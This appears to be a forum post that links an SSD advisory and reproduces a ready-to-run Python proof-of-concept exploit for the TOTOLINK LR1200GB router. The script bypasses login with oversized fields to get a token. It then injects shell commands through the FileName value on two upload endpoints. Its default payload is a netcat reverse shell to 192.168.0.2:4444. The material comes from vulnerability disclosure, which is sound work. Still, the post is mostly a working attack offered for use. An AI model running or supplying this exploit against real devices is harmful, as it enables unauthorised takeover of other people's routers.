Remote TOTOLINK LR1200GB AUTH BYPASS

[varwar]

Статья с деталями: https://ssd-disclosure.com/ssd-advisory-totolink-lr1200gb-auth-bypass/

Спойлер: ПоЦ

#!/usr/bin/python3
import json
import argparse
import sys
import requests
from colorama import Fore, Style

URL = "http://192.168.0.1/cgi-bin/cstecgi.cgi"


def login_bypass():
    login_bypass_payload = {
        "username": username,
        "password": password,
        "http_host": host,
        "verify": 0,
        "flag": 0,
        "topicurl": "loginAuth",
    }
    response = requests.post(URL, json=login_bypass_payload, timeout=1)
    try:
        token = json.loads(response.text).get("token")
        if token:
            print(f"{Fore.BLUE}{Style.BRIGHT}[*]{Style.RESET_ALL} Token: {token}")
            return token
        else:
            print(
                f"{Fore.RED}{Style.BRIGHT}[-]{Style.RESET_ALL} Not able to get the token"
            )
            sys.exit(0)

    except json.JSONDecodeError as e:
        print(
            f"{Fore.RED}{Style.BRIGHT}[-]{Style.RESET_ALL} Not able to decode the json"
        )
        sys.exit(0)


def upload_firmware_file_rce():
    print(f"{Fore.BLUE}{Style.BRIGHT}[*]{Style.RESET_ALL} Executing command: {cmd}")
    filename = "File File;" + cmd + "; ls -al >"
    payload = {
        "FileName": filename,
        "FullName": "File",
        "ContentLength": "10000",
        "topicurl": "UploadFirmwareFile",
        "token": login_bypass(),
    }
    requests.post(URL, json=payload, timeout=1)


def set_upload_setting_rce():
    print(f"{Fore.BLUE}{Style.BRIGHT}[*]{Style.RESET_ALL} Executing command: {cmd}")
    filename = "File File;" + cmd + "; ls -al >"
    payload = {
        "FileName": filename,
        "FullName": "File",
        "ContentLength": "10000",
        "topicurl": "setUploadSetting",
        "token": login_bypass(),
    }
    requests.post(URL, json=payload, timeout=1)


def main():
    parser = argparse.ArgumentParser(
        description="Command-line tool for a hypothetical application."
    )

    parser.add_argument(
        "-u", "--username", type=str, help="Username for authentication", required=False
    )
    parser.add_argument(
        "-p", "--password", type=str, help="Password for authentication", required=False
    )
    parser.add_argument(
        "-e",
        "--exploit",
        type=str,
        help="arguments can be login_bypass, set_upload_setting_rce, upload_firmware_file_rce",
        required=True,
    )
    parser.add_argument("-t", "--host", type=str, help="Host address", required=False)
    parser.add_argument(
        "-c", "--cmd", type=str, help="Command to execute", required=False
    )

    args = parser.parse_args()

    global username, password, host, cmd

    username = args.username if args.username else "A" * 50
    password = args.password if args.password else "A" * 12
    host = args.host if args.host else "A" * 304
    cmd = args.cmd if args.cmd else "nc 192.168.0.2 4444 -e /bin/sh"

    exploit = globals().get(args.exploit)
    if exploit and callable(exploit):
        exploit()
    else:
        print(
            f"{Fore.RED}{Style.BRIGHT}[-]{Style.RESET_ALL} Given exploit doesn't exist"
        )


if __name__ == "__main__":
    main()